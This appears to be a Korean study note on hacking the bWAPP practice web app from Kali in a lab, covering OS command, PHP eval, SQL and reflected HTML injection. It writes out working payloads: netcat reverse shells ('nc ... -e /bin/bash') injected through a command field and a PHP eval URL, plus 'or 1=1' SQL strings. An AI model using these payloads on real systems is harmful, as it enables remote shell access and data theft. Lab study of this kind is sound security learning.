IT 공부용

1. OS Command Injection 공격 당하는 애 : hWAPP 공격하는 애 : kali |nc 192.168.50.60 666 -e /bin/bash // hWAPP에서 192.168.50.60 666(포트)를 열어준다. nc -l -p 666 // 칼리에서는 hWAPP에 있는 ls 파일을 다 까 볼 수 있다. 2. PHP code Injection 까보면 eval(함수안에 있는구문을 무조건 실행시키게 하는 함수) 때문에 잘못됨 extra) http://192.168.50.18/bWAPP/phpi.php?message=test; system("nc 192.168.50.60 666 -e /bin/bash"); 파이프 빼고 ㄱㄱ 하면 탈취 가능

or 1=1; ==> SQL 인젝션의 키포인트~! SELECT height, name FROM buyTBL or 1=1 #; (Injection 구문) SELECT * FROM userTBL; (개발자 쓴거)(# 있어서 여기 실행 안댐 -> 공격자 입장에서 syntax error을 안내기 위해 ) 1. command에서 bwAPP 데이터베이스의 movie table 조회 하는데 or 1=1 을 때리면 바로 전체 movie정보 다 볼수 있음; 7번자리에 @@version 같은 함수 때릴수 있음 2. bwapp 에서 작업(SQL injection(get/search)) 2.1 예측 select * from movie where title=iron man; select * from movie where whe..

관리자 권한 없는건 다 까볼 수 있음 그래서 무섭다.

로그인할 때 reflected 공격 = > 돌아오는 과정에서 조작하고 보냄 level 도 설정 가능 low medium high ● GET 방식 1. 글씨 넣기(low level) 오른쪽 위에 HTML Injection - reflect(get) 방식으로 Hack누름 html에 injection 하면 밑에 이렇게 뜸 이게 얼마나 무섭냐면 이런거 넣으면 알림창 ㅈㄴ뜸 2. 사진넣기!! 를 로그인 창에 넣으면 이렇게 귀엽게 나옴 3. medium 수준에서 사진 넣기 인코딩에는 https://www.convertstring.com/ko/EncodeDecode/UrlEncode URL 인코딩 - 온라인 URL 인코더 www.convertstring.com https://www.convertstring.com/k..